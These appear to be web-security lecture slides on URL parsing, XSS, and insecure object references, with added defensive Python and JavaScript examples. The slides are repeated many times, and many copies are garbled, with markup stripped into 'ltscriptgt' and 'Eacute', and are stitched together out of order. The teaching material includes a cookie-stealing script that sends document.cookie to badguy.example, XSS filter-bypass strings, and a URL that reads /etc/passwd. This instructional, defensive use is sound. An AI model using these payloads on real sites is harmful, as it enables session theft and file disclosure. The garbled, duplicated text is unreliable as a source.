Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence
There should have been a re-authorization stepA well-written app should only allow access to its ownresources
Looking at anyonersquos bank account
ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt
ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt
ltselectgtltinput type=submit name=show value=Show Accountgt
ltformgt
Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo
A genius clearly
Solutions for object referencingRe-validate
Eacute Check authorization againEacute Obvious solution but duplicates effort
Add a data indirection
Eacute Session-specific server side array of account nos
ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt
Eacute Similarly for file access
httpresearchsiteedacukshowhtmlphpfile=1Introduction
for many files a hash table or database could be used
Passing too much information
Old flaw passing unnecessary information to client andexpecting it back unmodified
ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$
value=templatesfeedbacktxtgtltinput type=hidden name=$To$
value=feedbacksomesiteexamplegtltformgt
Protecting information in server data
Sometimes the server must pass information to theclient during the interaction but must protect it
Example editing a wiki page
ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt
ltformgt
Solution add a MAC constructed with a server-sidesecret key
ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt
Or could encrypt the pagename
Other authorization mistakes
Assuming requests occur in proper order
Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step
Authorization by obscurity
Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it
httpwwwmyservercomsecretareaprivatepaperpdf
Review questionsURLs
Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protectyour users
XSS
Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session
Object references
Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server
References
Some commentary and examples were taken from thetexts
Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004
Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zelewski No Starch Press2012 (Recommended)
as well as the named RFCs
- Overview
- Basics URLs
- Output Filtering and XSS
- Object references
Fragment identifier
lastsection
Eacute Interpretation depends on client resource typeEacute in practice anchor names in HTML elements
Eacute Not intended to be sent to serverEacute Recent use store client-side state while browsing
Eacute can be changed without page reloadEacute easily bookmarked sharedEacute eg map locations
Metacharacters

- Some punctuation characters are not allowed
- e.g. [ ] $ & ' ( ) =
- These are URL encoded with percent-ASCII hex
- e.g. %2F encodes /, %25 encodes %

The RFC does not specify a fixed mapping, and browsers try to interpret as many user inputs as possible. E.g. examples like http://%65xample.%63om

Moreover, RFCs are not always followed.

Non-ASCII text encodings in URLs

- Original standards did not allow for non-ASCII text
- but clearly desirable for non-English text
- RFC 3492 introduced Punycode to allow behind-the-scenes DNS lookup
- DNS lookup: xn--[US-ASCII]-[Unicode]
- Browser display: Unicode part

Extension of 38 characters to 100,000 glyphs allowed many homograph attacks

- peacom has 5 identical-looking Cyrillic chars
- there are non-slash characters that look like /
- some attacks not easily prevented by DNS registrars

We have (puny) browser, search engine defences for this. Moral: probably better to stick with ASCII.
Overall consequences

Parsing URLs: more complicated than you imagined

- better to use well-tested libraries than ad hoc code

But for output, want to be very careful

- especially if URLs made from user (attacker) input
- should canonicalize, then filter, reformat
- filter especially on the scheme and authority

Overall consequences

Eyeballs can easily be fooled when looking at URLs:

  http://example.com&gibberish=1234@167772161/
  http://example.com\@coredump.cx/
  http://example.com;.coredump.cx/

Which server is visited by these URLs?

Examples from The Tangled Web
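As an added example (not from the slides or from the cited texts), here is the "canonicalize, then filter on scheme and authority" advice applied in Python to URLs taken from untrusted input, including the three eyeball-fooling URLs above. The allowlists ALLOWED_SCHEMES and ALLOWED_HOSTS and the function canonicalize_url are assumptions for the illustration; the standard library's urllib.parse does the parsing.

```python
import posixpath
from urllib.parse import urlsplit, urlunsplit, unquote, quote

# Constructed allowlists: a real app would load these from its configuration.
ALLOWED_SCHEMES = {"http": 80, "https": 443}   # scheme -> default port
ALLOWED_HOSTS = {"example.com", "www.example.com"}


def canonicalize_url(raw):
    """Canonicalize a URL taken from untrusted input, then filter it.

    Returns the canonical string, or None if the URL must be rejected.
    Scheme and authority are checked strictly because they decide which
    server a browser will actually contact; the fragment is dropped because
    it is never sent to the server.
    """
    # Backslash: some browsers treat it as '/', others as part of the host,
    # so the same URL would reach different servers depending on the client.
    if "\\" in raw or any(ord(c) < 0x20 for c in raw):
        return None
    try:
        parts = urlsplit(raw.strip())
        port = parts.port            # ValueError for a non-numeric port
    except ValueError:
        return None

    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return None                  # e.g. javascript:, data:, file:

    netloc = parts.netloc
    # Userinfo: everything before '@' is decoy text, the real host follows.
    # Percent-encoding or non-ASCII in the host hides the real name from a
    # human reader, so both are refused outright.
    if "@" in netloc or "%" in netloc or not netloc.isascii():
        return None
    host = parts.hostname            # already lower-cased by urlsplit
    if host is None or host not in ALLOWED_HOSTS:
        return None
    # Defence in depth should the allowlist ever be relaxed to a suffix
    # match: Punycode labels can display as Unicode homographs.
    if any(label.startswith("xn--") for label in host.split(".")):
        return None

    # Path: decode exactly once, collapse '.' and '..', then re-encode so the
    # output has a single, predictable encoding.
    path = posixpath.normpath(unquote(parts.path) or "/")
    if not path.startswith("/"):
        return None
    path = quote(path, safe="/")

    if port in (None, ALLOWED_SCHEMES[scheme]):
        authority = host
    else:
        authority = "%s:%d" % (host, port)
    return urlunsplit((scheme, authority, path, parts.query, ""))
```

All three Tangled Web URLs are rejected, for three different reasons (userinfo before "@", a backslash, a host that is not on the allowlist), and a messy but legitimate URL comes out in one fixed form.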
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
XSS attacks in general

- Attack typically on (another) user of the web app
- Attacker tricks app into displaying malicious code
- typically script code

Many possible aims

- display random images, popup windows
- change page contents, e.g. alter bank account number
- session hijacking: steal session cookies

Session hijacking with XSS

[Picture from Innocent Code]

Example injected script:

  <script>document.location.replace("http://www.badguy.example/steal.php?what=" + document.cookie)</script>

- redirects victim's browser to attacker's site, passing cookie
- might also pass currently visited web page
- then attacker's server can issue a redirect back again

Reflected XSS

Reflected XSS occurs when injected malicious code isn't stored in server but is immediately displayed in the visited page. Suppose

  http://mymanpages.org/manpage.php?title=Man+GCC&program=gcc

dynamically makes HTML embedding title directly:

  <h1>Man GCC</h1>

An attacker could use this with a malicious input

  title=<script>...</script>&program=gcc

which e.g. steals a cookie.

Exercise: Explain how this attack works in practice.

XSS Solutions

Input processing: tricky, need to understand data flow through app, quoting/encoding passed to/from functions, databases etc. Hence: output filtering.

Plain output: HTML encoding

- Stored data values need to be encoded to represent in HTML (e.g. < converted to &lt; etc)

Marked up output: complex filtering

- Need to work through tags in input and rule out risky ones. Scripts may appear in attributes. Flaky.

Marked up output: DSL

- A better approach: use a dedicated syntax, convert to restricted subset of HTML
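The three output strategies above, as an added Python example that is not part of the lecture: HTML encoding for element content and for attribute values (the reflected manpage title is rendered safely), a link helper showing why attribute encoding alone does not handle a user-supplied URL, and a tiny restricted-markup DSL (*bold* and _italic_ only) that encodes everything first and then emits only the two tags it generates itself. The function names and the DSL syntax are assumptions for the illustration.

```python
import html
import re
from urllib.parse import urlsplit


def encode_text(value):
    """Encode untrusted data for element content: &, <, > become entities."""
    return html.escape(value, quote=False)


def encode_attr(value):
    """Encode untrusted data for a double-quoted attribute value (quotes too)."""
    return html.escape(value, quote=True)


def render_manpage_title(title):
    """The manpage.php heading with the title encoded rather than embedded raw."""
    return "<h1>%s</h1>" % encode_text(title)


def render_link(text, href):
    """A link whose URL comes from untrusted input.

    Attribute encoding does not neutralise a javascript: URL (the browser
    decodes the attribute before using it), so the scheme is checked
    separately and anything but http(s) is replaced by a harmless '#'.
    """
    if urlsplit(href).scheme.lower() not in ("http", "https"):
        href = "#"
    return '<a href="%s">%s</a>' % (encode_attr(href), encode_text(text))


# Restricted markup DSL: *bold* and _italic_ only.  The source is encoded
# first, so the only tags that can reach the output are the two made here.
_BOLD = re.compile(r"\*([^*\n]+)\*")
_ITALIC = re.compile(r"_([^_\n]+)_")


def render_restricted_markup(source):
    out = html.escape(source, quote=True)
    out = _BOLD.sub(r"<b>\1</b>", out)
    out = _ITALIC.sub(r"<i>\1</i>", out)
    return out
```

The order in render_restricted_markup matters: encoding after the substitution would also encode the generated <b> and <i> tags, while substituting on raw input would let a "*" pair wrap attacker-supplied tags unchanged.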
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Embarrassing PHP blunders

  http://research.site.ed.ac.uk/showhtml.php?title=User+Manual&file=release%2FUserman.html#Introduction

A "cool" PHP script, showhtml.php:

- take a plain HTML file
- wrap it with navigation links, site style
- convert the internal links to reference back to wrapped version

Embarrassing PHP blunders

  http://research.site.ed.ac.uk/showhtml.php?title=User+Manual&file=%2Fetc%2Fpasswd

- remote users can visit any file on the system
- mistake motivates defence-in-depth
- http server should not serve up any file
- use internal web server config (separate apps)
- and external OS config (e.g. nobody user, chroot)

Authorization and object access

What was the problem here?

- the app developer (implicitly) authorized users to read documentation files he had created
- project was open source, no need for logins
- app contained no paths to files outside the project
- so no explicit authorization code was written
- but PHP code didn't check the filename returned
- showhtml.php provided access to server objects
- input validation only checked for file existence

There should have been a re-authorization step. A well-written app should only allow access to its own resources.

Looking at anyone's bank account

  <form action="show-account.asp" method="get">
  Account to display:
  <select name="account">
    <option value="12345678901">12345678901</option>
    <option value="12346543210">12346543210</option>
  </select>
  <input type="submit" name="show" value="Show Account">
  </form>

Example from Innocent Code, based on a Norwegian newspaper story about a "17-year geek able to view anyone's bank account".

A genius, clearly.

Solutions for object referencing

Re-validate

- Check authorization again
- Obvious solution, but duplicates effort

Add a data indirection

- Session-specific server side array of account nos

  <option value="1">12345678901</option>
  <option value="2">12346543210</option>

- Similarly for file access

  http://research.site.ed.ac.uk/showhtml.php?file=1#Introduction

For many files a hash table or database could be used.
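Both solutions from the slide (re-validation and data indirection), as an added Python example that is not the lecture's or the books' code, serving the bank-account form and the showhtml.php file case together: a per-session indirection table that hands the client opaque keys "1", "2", ... instead of account numbers or file names, an explicit re-authorization step on the way back in, and a path-confinement check for the case where a file name must still come from the client. The class SessionRefs, the functions confine_path and show_account, and the base directory /srv/docs are assumptions for the illustration.

```python
import posixpath
from urllib.parse import unquote


class SessionRefs:
    """Per-session indirection table: small opaque keys -> real object ids.

    The client only ever sees the keys; the real account numbers or file
    names stay on the server, so a client that edits the key can at most
    select another object this same session was already offered.
    """

    def __init__(self):
        self._refs = {}

    def register(self, real_id):
        key = str(len(self._refs) + 1)
        self._refs[key] = real_id
        return key

    def resolve(self, key):
        return self._refs.get(key)   # None for a key this session never issued


def show_account(session, owned_accounts, key):
    """Re-validate: resolve the key, then check the account really belongs to
    the logged-in user before displaying it (defence in depth on top of the
    indirection)."""
    account = session.resolve(key)
    if account is None or account not in owned_accounts:
        return None
    return account


def confine_path(base_dir, requested):
    """Map a client-supplied relative file name onto base_dir, or return None.

    Decodes exactly once, normalizes lexically and refuses anything that
    would escape base_dir.  Symbolic links inside base_dir are left to the
    OS-level configuration (unprivileged user, chroot) the slide recommends.
    """
    name = unquote(requested)
    if "\x00" in name or "\\" in name or name.startswith("/"):
        return None
    norm = posixpath.normpath(name)
    if norm == ".." or norm.startswith("../") or norm.startswith("/"):
        return None
    return posixpath.join(base_dir, norm)
```

Note that confine_path decodes the parameter once and then works on the decoded string; decoding again after normalizing would reopen the door to encoded ".." sequences.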
Passing too much information

Old flaw: passing unnecessary information to client and expecting it back unmodified

  <form action="/cgi-bin/cgimail.exe" method="post">
  <input type="hidden" name="$File$" value="templates/feedback.txt">
  <input type="hidden" name="$To$" value="feedback@somesite.example">
  </form>

Protecting information in server data

Sometimes the server must pass information to the client during the interaction, but must protect it.

Example: editing a wiki page

  <form>
  <input type="hidden" name="pagename" value="NineteenSixtiesToys">
  <textarea cols="80" rows="25" name="wpText">
  </textarea>
  </form>

Solution: add a MAC constructed with a server-side secret key

  <input type="hidden" name="pagemac" value="bc9faaae1e35d52f3dea9651da12cd36627b8403">

Or could encrypt the pagename.
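The MAC-protected hidden field, as an added Python example (not the lecture's code): the server computes an HMAC over the pagename, bound to the session it was issued to, emits it as the pagemac field, and on submit recomputes and compares it in constant time before trusting the returned pagename. The slide's 40-hex value suggests an HMAC-SHA-1; this example uses HMAC-SHA-256, and the key handling, the JSON framing of the MAC input and the function names are assumptions for the illustration.

```python
import hashlib
import hmac
import json
import secrets

# Constructed: generated once at server start and never sent to a client.
# A real deployment would load it from protected server-side configuration.
SERVER_KEY = secrets.token_bytes(32)


def page_mac(pagename, session_id, key=SERVER_KEY):
    """HMAC over the hidden field value, bound to the issuing session."""
    # JSON framing makes the (session, pagename) pair unambiguous: no choice
    # of pagename can produce the same bytes as a different pair.
    msg = json.dumps([session_id, pagename]).encode("utf-8")
    return hmac.new(key, msg, hashlib.sha256).hexdigest()


def hidden_fields(pagename, session_id):
    """The two hidden inputs the edit form carries.  When rendered into HTML
    the pagename value still needs attribute encoding; the MAC is plain hex."""
    return {"pagename": pagename, "pagemac": page_mac(pagename, session_id)}


def verify_edit(form, session_id, key=SERVER_KEY):
    """On submit: recompute the MAC from the returned pagename and compare in
    constant time.  Returns the pagename the server may trust, or None."""
    pagename = form.get("pagename")
    pagemac = form.get("pagemac", "")
    if pagename is None:
        return None
    expected = page_mac(pagename, session_id, key)
    if not hmac.compare_digest(expected, pagemac):
        return None
    return pagename
```

Binding the session id into the MAC input means a valid (pagename, pagemac) pair captured from one user's form cannot be replayed by another session; without that binding the MAC would only prove that the server had once issued that pagename to someone.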
Other authorization mistakes

Assuming requests occur in proper order

- For an admin task (e.g. password reset), assuming that user must have issued a GET to retrieve a form before a POST
- only checking authorization on first step

Authorization by obscurity

- Supposing that because a web page is not linked to the main site, only people who are given it will be able to reach it

  http://www.myserver.com/secretarea/privatepaper.pdf
Review questions

URLs

- Recap the 8 components of a URL. From a server-side point of view, which of these is trustworthy? From the web app viewpoint, which of these is it most important to validate in output to protect your users?

XSS

- Explain how session stealing works with XSS. How could a reflected XSS attack steal a session?

Object references

- Why is it important to add defence-in-depth when configuring web servers? Give three examples of ways in which a web application may be restricted by a (separate) server.

References

Some commentary and examples were taken from the texts

- Innocent Code: a security wake-up call for web programmers, by Sverre H. Huseby, Wiley 2004
- The Tangled Web: a Guide to Securing Modern Web Applications, by Michal Zalewski, No Starch Press 2012 (Recommended)

as well as the named RFCs.
Object references
XSS attacks in general
É Attack typically on (another) user of the web app
É Attacker tricks app into displaying malicious code
  É typically script code
Many possible aims:
É display random images, popup windows
É change page contents, e.g. alter a bank account number
É session hijacking: steal session cookies
Session hijacking with XSS
[Picture from Innocent Code]
Example injected script:
<script>document.location.replace("http://www.badguy.example/steal.php?" + "what=" + document.cookie)</script>
É redirects victim's browser to attacker's site, passing the cookie
É might also pass the currently visited web page
  É then the attacker's server can issue a redirect back again, so the victim sees only a flicker
É caveat: a session cookie set with the HttpOnly flag cannot be read from document.cookie, which blunts this particular payload; injected script can still issue requests as the victim from inside the page, so it is a mitigation, not a fix
Reflected XSS
Reflected XSS occurs when the injected malicious code isn't stored in the server but is immediately displayed in the visited page. Suppose
http://mymanpages.org/manpage.php?title=Man+GCC&program=gcc
dynamically makes HTML embedding title directly:
<h1>Man GCC</h1>
An attacker could use this with a malicious input
title=<script></script>&program=gcc
(with, e.g., the cookie-stealing script above as the body), which the victim has to be lured into requesting, e.g. via a link in an email or on another site.
Exercise: Explain how this attack works in practice.
XSS Solutions
Input processing: tricky, need to understand the data flow through the app (quoting, encoding, values passed to/from functions, databases, etc). Hence: output filtering.
Plain output: HTML encoding
É Stored data values need to be encoded to represent them in HTML (e.g. < converted to &lt;, etc.)
É Encoding is context dependent: the same value needs HTML encoding in a text node or quoted attribute, URL encoding inside a link, and JavaScript string escaping inside a script. A value placed in an unquoted attribute or a javascript: URL cannot be made safe by encoding alone.
Marked up output: complex filtering
É Need to work through tags in input and rule out risky ones. Scripts may appear in attributes. Flaky.
Marked up output: DSL
É A better approach: use a dedicated syntax, convert to a restricted subset of HTML.
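The reflected XSS case and the "encode at output, don't filter at input" advice above, worked through as an added example in Node.js. This is not code from the lecture or from Innocent Code; the function names, the rendered page layout and the attacker strings are assumptions made for the example. It shows the vulnerable render beside the fixed one, and why a naive strip-the-script-tag input filter is flaky while output encoding holds regardless of the trick used.

```javascript
// Added example (not part of the lecture): output encoding for the
// manpage.php reflected-XSS case, in Node.js.  The function names and the
// page layout rendered here are assumptions made for this example.

// Encode the five characters that can change meaning in HTML text or in a
// quoted attribute value.  Encoding both quote characters means one
// function covers text nodes and double- or single-quoted attributes.
function htmlEncode(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// The slide's vulnerable pattern: the title parameter is embedded directly.
function renderManpageVulnerable(title, program) {
  return `<h1>${title}</h1>\n<a href="/man/${program}" title="${title}">source</a>`;
}

// The fixed pattern: each untrusted value is encoded for the context it
// lands in (HTML text and quoted attribute via htmlEncode, URL path
// segment via encodeURIComponent).
function renderManpage(title, program) {
  const t = htmlEncode(title);
  const p = encodeURIComponent(program);
  return `<h1>${t}</h1>\n<a href="/man/${p}" title="${t}">source</a>`;
}

// An input-side filter of the kind the slide calls flaky: it removes
// <script>...</script> in one pass and nothing else.
function naiveStripScript(s) {
  return String(s).replace(/<script[^>]*>.*?<\/script>/gi, "");
}

// Constructed attacker inputs, based on the lecture's cookie-stealing payload.
const STEAL =
  '<script>document.location.replace("http://www.badguy.example/steal.php?what=" + document.cookie)</script>';
// Breaks out of the title="..." attribute and uses an event handler: no <script> tag at all.
const BYPASS_ATTR =
  '"><img src=x onerror="document.location.replace(\'http://www.badguy.example/steal.php?what=\' + document.cookie)">';
// Survives a single stripping pass: removing the inner <script></script> reassembles the outer tag.
const BYPASS_NESTED = "<scr<script></script>ipt>alert(1)</script>";

function demo() {
  const vulnerable = renderManpageVulnerable(STEAL, "gcc");
  const fixed = renderManpage(STEAL, "gcc");
  return {
    // The payload is reflected verbatim, so the victim's browser runs it.
    payloadReflectedRaw: vulnerable.includes(STEAL),
    // With encoding the browser shows the payload as text and runs nothing.
    payloadEncoded: !fixed.includes("<script") && fixed.includes("&lt;script&gt;"),
    // Input filtering misses the handler-in-attribute form entirely...
    stripFilterMissesHandler: naiveStripScript(BYPASS_ATTR) === BYPASS_ATTR,
    // ...and one pass over the nested form produces a live <script> tag.
    stripFilterReassembles: naiveStripScript(BYPASS_NESTED) === "<script>alert(1)</script>",
    // Output encoding neutralises both without knowing the trick used.
    handlerEncoded: !renderManpage(BYPASS_ATTR, "gcc").includes("<img"),
    nestedEncoded: !renderManpage(BYPASS_NESTED, "gcc").includes("<script"),
  };
}

console.log(demo());
```

Run it with `node` and every field of the printed object is `true`. The design point is that `renderManpage` needs no knowledge of the attack: it encodes for the destination context, which is why output encoding is the primary defence and input filtering at best a second layer.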
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Embarrassing PHP blunders
http://research.site.ed.ac.uk/showhtml.php?title=User+Manual&file=release%2FUserman.html#Introduction
A "cool" PHP script showhtml.php:
É take a plain HTML file
É wrap it with navigation links, site style
É convert the internal links to reference back to the wrapped version
Embarrassing PHP blunders
http://research.site.ed.ac.uk/showhtml.php?title=User+Manual&file=%2Fetc%2Fpasswd
É remote users can visit any file on the system (that the web server's account can read)
É the mistake motivates defence-in-depth:
É the http server should not serve up just any file
É use internal web server config (separate apps)
É and external OS config (e.g. nobody user, chroot)
Authorization and object access
What was the problem here?
É the app developer (implicitly) authorized users to read documentation files he had created
É project was open source, no need for logins
É app contained no paths to files outside the project
É so no explicit authorization code was written
É but the PHP code didn't check the filename returned
É showhtml.php provided access to server objects
É input validation only checked for file existence
There should have been a re-authorization step. A well-written app should only allow access to its own resources.
Looking at anyone's bank account
<form action="show-account.asp" method="get">
Account to display:
<select name="account">
<option value="12345678901">12345678901</option>
<option value="12346543210">12346543210</option>
</select>
<input type="submit" name="show" value="Show Account">
</form>
The form only offers the user's own accounts, but the server trusts whatever account value arrives; editing it in the request shows any account.
Example from Innocent Code, based on a Norwegian newspaper story about a "17-year-old geek able to view anyone's bank account".
A genius, clearly.
Solutions for object referencing
Re-validate
É Check authorization again
É Obvious solution, but duplicates effort
Add a data indirection
É Session-specific server-side array of account nos:
<option value="1">12345678901</option>
<option value="2">12346543210</option>
É Similarly for file access:
http://research.site.ed.ac.uk/showhtml.php?file=1#Introduction
É for many files, a hash table or database could be used
É indirection only helps if the table is built per session from objects the user is entitled to; a single global table merely renames the references
Passing too much information
Old flaw: passing unnecessary information to the client and expecting it back unmodified.
<form action="/cgi-bin/cgimail.exe" method="post">
<input type="hidden" name="$File$" value="templates/feedback.txt">
<input type="hidden" name="$To$" value="feedback@somesite.example">
</form>
É a hidden field is just another request parameter the client controls: a changed $File$ reads whatever file the server can, a changed $To$ sends it anywhere
É values the client never needs to choose should stay on the server (e.g. in the server-side configuration or session), not round-trip through the form
Protecting information in server data
Sometimes the server must pass information to the client during the interaction, but must protect it.
Example: editing a wiki page
<form>
<input type="hidden" name="pagename" value="NineteenSixtiesToys">
<textarea cols="80" rows="25" name="wpText"></textarea>
</form>
Solution: add a MAC constructed with a server-side secret key
<input type="hidden" name="pagemac" value="bc9faaae1e35d52f3dea9651da12cd36627b8403">
É the server recomputes the MAC on submit and rejects the request if it differs; the client cannot forge one without the key
É bind the MAC to the session (or user) as well, otherwise a MAC copied from one user's form is valid in another's
Or could encrypt the pagename (but encryption alone hides the value without stopping tampering; an authenticated encryption mode, or encrypt-then-MAC, is needed for that).
Other authorization mistakes
Assuming requests occur in proper order
É For an admin task (e.g. password reset), assuming that the user must have issued a GET to retrieve a form before a POST
É only checking authorization on the first step; the POST must be authorized on its own, since a client can send it directly
Authorization by obscurity
É Supposing that because a web page is not linked to the main site, only people who are given it will be able to reach it:
http://www.myserver.com/secretarea/privatepaper.pdf
É such URLs leak through Referer headers, browser history, proxy and server logs, and directory listings; an unlinked URL is not a credential
Review questions
URLs
É Recap the 8 components of a URL. From a server-side point of view, which of these is trustworthy? From the web app viewpoint, which of these is it most important to validate in output, to protect your users?
XSS
É Explain how session stealing works with XSS. How could a reflected XSS attack steal a session?
Object references
É Why is it important to add defence-in-depth when configuring web servers? Give three examples of ways in which a web application may be restricted by a (separate) server.
References
Some commentary and examples were taken from the texts
É Innocent Code: a security wake-up call for web programmers, by Sverre H. Huseby, Wiley 2004
É The Tangled Web: a Guide to Securing Modern Web Applications, by Michal Zalewski, No Starch Press 2012 (Recommended)
as well as the named RFCs.
- Overview
- Basics URLs
- Output Filtering and XSS
- Object references
XSS attacks in general
Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code
Eacute typically script code
Many possible aims
Eacute display random images popup windowsEacute change page contents eg alter bank account
numberEacute session hijacking steal session cookies
Session hijacking with XSS
[Picture from Innocent Code
Example injected script
ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)
ltscriptgt
Eacute redirects victimrsquos browser to attackers site passingcookie
Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back
again
Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed inthe visited page Suppose
httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gccgt
dynamically makes HTML embedding title directly
lth1gtMan GCClth1gt
An attacker could use this with a malicious input
title=ltscriptgtltscriptgtprogram=gcc
which eg steals a cookie
Exercise Explain how this attack works in practice
XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering
Plain output HTML encoding
Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)
Marked up output complex filtering
Eacute Need to work through tags in input and rule outrisky ones Scripts may appear in attributes Flaky
Marked up output DSL
Eacute A better approach use a dedicated syntax convertto restricted subset of HTML
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction
A ldquocoolrdquo PHP script showhtmlphp
Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to
wrapped version
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd
Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth
Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)
Authorization and object access
What was the problem here
Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written
Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence
There should have been a re-authorization stepA well-written app should only allow access to its ownresources
Looking at anyonersquos bank account
ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt
ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt
ltselectgtltinput type=submit name=show value=Show Accountgt
ltformgt
Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo
A genius clearly
Solutions for object referencingRe-validate
Eacute Check authorization againEacute Obvious solution but duplicates effort
Add a data indirection
Eacute Session-specific server side array of account nos
ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt
Eacute Similarly for file access
httpresearchsiteedacukshowhtmlphpfile=1Introduction
for many files a hash table or database could be used
Passing too much information
Old flaw passing unnecessary information to client andexpecting it back unmodified
ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$
value=templatesfeedbacktxtgtltinput type=hidden name=$To$
value=feedbacksomesiteexamplegtltformgt
Protecting information in server data
Sometimes the server must pass information to theclient during the interaction but must protect it
Example editing a wiki page
ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt
ltformgt
Solution add a MAC constructed with a server-sidesecret key
ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt
Or could encrypt the pagename
Other authorization mistakes
Assuming requests occur in proper order
Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step
Authorization by obscurity
Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it
httpwwwmyservercomsecretareaprivatepaperpdf
Review questionsURLs
Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protectyour users
XSS
Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session
Object references
Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server
References
Some commentary and examples were taken from thetexts
Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004
Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zelewski No Starch Press2012 (Recommended)
as well as the named RFCs
- Overview
- Basics URLs
- Output Filtering and XSS
- Object references
Session hijacking with XSS
[Picture from Innocent Code
Example injected script
ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)
ltscriptgt
Eacute redirects victimrsquos browser to attackers site passingcookie
Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back
again
Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed inthe visited page Suppose
httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gccgt
dynamically makes HTML embedding title directly
lth1gtMan GCClth1gt
An attacker could use this with a malicious input
title=ltscriptgtltscriptgtprogram=gcc
which eg steals a cookie
Exercise Explain how this attack works in practice
XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering
Plain output HTML encoding
Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)
Marked up output complex filtering
Eacute Need to work through tags in input and rule outrisky ones Scripts may appear in attributes Flaky
Marked up output DSL
Eacute A better approach use a dedicated syntax convertto restricted subset of HTML
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction
A ldquocoolrdquo PHP script showhtmlphp
Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to
wrapped version
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd
Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth
Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)
Authorization and object access
What was the problem here
Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written
Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence
There should have been a re-authorization stepA well-written app should only allow access to its ownresources
Looking at anyonersquos bank account
ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt
ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt
ltselectgtltinput type=submit name=show value=Show Accountgt
ltformgt
Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo
